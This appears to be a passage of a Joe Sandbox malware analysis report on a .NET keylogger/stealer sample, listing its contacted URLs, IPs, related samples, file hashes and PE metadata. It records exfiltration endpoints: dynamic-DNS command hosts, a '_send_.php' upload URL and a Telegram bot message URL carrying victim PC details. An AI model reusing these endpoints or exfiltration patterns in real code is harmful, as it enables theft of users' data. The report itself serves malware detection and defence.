                                                            http://varders.kozow.com:8081sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://aborters.duckdns.org:8081sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ac.ecosia.org/autocomplete?q=InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20aInstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://anotherarmy.dns.army:8081sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchInstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://checkip.dyndns.org/qsS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://chrome.google.com/webstore?hl=enlBInstallUtil.exe, 0000000A.00000002.2528573106.0000000002D31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://reallyfreegeoip.org/xml/8.46.123.189$InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://reallyfreegeoip.orgInstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedsS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://reallyfreegeoip.org/xml/sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        149.154.167.220
                                                                                        		api.telegram.orgUnited Kingdom
                                                                                        		62041TELEGRAMRUfalse
                                                                                        104.21.64.1
                                                                                        		reallyfreegeoip.orgUnited States
                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                        158.101.44.242
                                                                                        		checkip.dyndns.comUnited States
                                                                                        		31898ORACLE-BMC-31898USfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                        Analysis ID:1588892
                                                                                        Start date and time:2025-01-11 06:48:04 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 6m 7s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:14
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:sS7Jrsk0Z7.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:399908f6dc7e0dcad418f2cadd782f26f66adfdf1e523725dbc14713033c44a7.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 50%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 96%
                                                                                        • Number of executed functions: 194
                                                                                        • Number of non-executed functions: 37
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 2.23.242.162, 13.107.246.45, 20.109.210.53
                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target InstallUtil.exe, PID 7612 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        00:49:09API Interceptor104x Sleep call for process: sS7Jrsk0Z7.exe modified
                                                                                        01:59:34API Interceptor214846x Sleep call for process: InstallUtil.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        149.154.167.220lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                  YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                            104.21.64.1SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.mffnow.info/0pqe/
                                                                                                            4sfN3Gx1vO.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.vilakodsiy.sbs/w7eo/
                                                                                                            1162-201.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.mzkd6gp5.top/utww/
                                                                                                            QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.mzkd6gp5.top/3u0p/
                                                                                                            Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                                                            • ordrr.statementquo.com/QCbxA/
                                                                                                            SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                            • adsfirm.com/administrator/index.php
                                                                                                            PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.bser101pp.buzz/v89f/
                                                                                                            158.101.44.2423qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            yqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            checkip.dyndns.com3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 132.226.247.73
                                                                                                            wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.247.73
                                                                                                            prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 193.122.130.0
                                                                                                            tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 132.226.247.73
                                                                                                            MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            reallyfreegeoip.org3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.16.1
                                                                                                            lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.48.1
                                                                                                            wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.80.1
                                                                                                            prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.48.1
                                                                                                            dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.16.1
                                                                                                            tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.48.1
                                                                                                            MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.64.1
                                                                                                            api.telegram.orglkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                            • 149.154.167.220

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            TELEGRAMRUlkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ORACLE-BMC-31898US3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 193.122.130.0
                                                                                                            fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            rwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            CLOUDFLARENETUS3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.16.1
                                                                                                            lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            https://mrohailkhan.com/energyaustralia/auth/auhs1/Get hashmaliciousUnknownBrowse
                                                                                                            • 172.64.155.59
                                                                                                            3.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 1.1.1.1
                                                                                                            prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            wSoShbuXnJ.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.86.111
                                                                                                            1507513743282749438.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                            • 162.159.61.3
                                                                                                            rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.48.1
                                                                                                            C6Abn5cBei.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.145.234

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            54328bd36c14bd82ddaa0c04b25ed9ad3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.64.1
                                                                                                            lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.64.1
                                                                                                            5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.64.1
                                                                                                            prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.64.1
                                                                                                            rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.64.1
                                                                                                            wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.64.1
                                                                                                            prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.64.1
                                                                                                            dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.64.1
                                                                                                            tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.64.1
                                                                                                            MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.64.1
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0elkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ZFCKpFXpzx.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ZFCKpFXpzx.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ZeAX5i7cGB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            jKqPSehspS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 149.154.167.220
                                                                                                            A6AHI7Uk18.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Wru9ycO2MJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 149.154.167.220
                                                                                                            iNFGd6bDZX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 149.154.167.220
                                                                                                            MyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 149.154.167.220

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sS7Jrsk0Z7.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\sS7Jrsk0Z7.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
                                                                                                            MD5:7B709BC412BEC5C3CFD861C041DAD408
                                                                                                            SHA1:532EA6BB3018AE3B51E7A5788F614A6C49252BCF
                                                                                                            SHA-256:733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
                                                                                                            SHA-512:B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
                                                                                                            Malicious:true
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):6.666819662352509
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:sS7Jrsk0Z7.exe
                                                                                                            File size:832'320 bytes
                                                                                                            MD5:6de308ce9b42f3ca44d87cd354dde9ae
                                                                                                            SHA1:6071d1e4f71527bb4e23f0ffce53b30dcb89500b
                                                                                                            SHA256:399908f6dc7e0dcad418f2cadd782f26f66adfdf1e523725dbc14713033c44a7
                                                                                                            SHA512:f9ad8c8723ee9f48450528599329cc782d08e377ca7ca49b6e8c5c9246054439334b9075822fbb282759dd60f22ad1a2f994174dd661e547cf2d4533b1c9ed27
                                                                                                            SSDEEP:12288:6S4rjpK9J4kLI4MlOIg5MCao3AiqLwgDz7PANSoZ:QwJXLIjOUo3A9Lv7PAB
                                                                                                            TLSH:7505F0007BE88878F9ED9A359930C7A14235FC1758A7D76F0A8D797B3C706121DE27A2
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................t.......-... ...@....@.. ....................................`................................

                                                                                                            File Icon

                                                                                                            Icon Hash:74f0d4d4d4d4d4cc

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x4b2dde
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:true
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x18D307F8 [Mon Mar 14 09:48:40 1983 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                            Authenticode Signature

                                                                                                            Signature Valid:false
                                                                                                            Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                            Error Number:-2146869232
                                                                                                            Not Before, Not After
                                                                                                            • 12/09/2023 10:27:07 12/09/2024 10:27:07
                                                                                                            Subject Chain
                                                                                                            • CN="Aicho Software Technology Co, Ltd.", O="Aicho Software Technology Co, Ltd.", L=Nanjing, S=Jiangsu, C=CN, OID.1.3.6.1.4.1.311.60.2.1.1=Nanjing, OID.1.3.6.1.4.1.311.60.2.1.2=Jiangsu, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=91320192MA1YED3N92, OID.2.5.4.15=Private Organization
                                                                                                            Version:3
                                                                                                            Thumbprint MD5:79D38F2D406C7322713C7279ED705306
                                                                                                            Thumbprint SHA-1:2FD2C86844F5A22BE05D4D9AFFAB5700E7543583
                                                                                                            Thumbprint SHA-256:ACA29813062BD0DBC01DBE01A055F150851C540C1ED4ABA824FF6347B259D302
                                                                                                            Serial:17316E9A9363855F7E003DF9

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
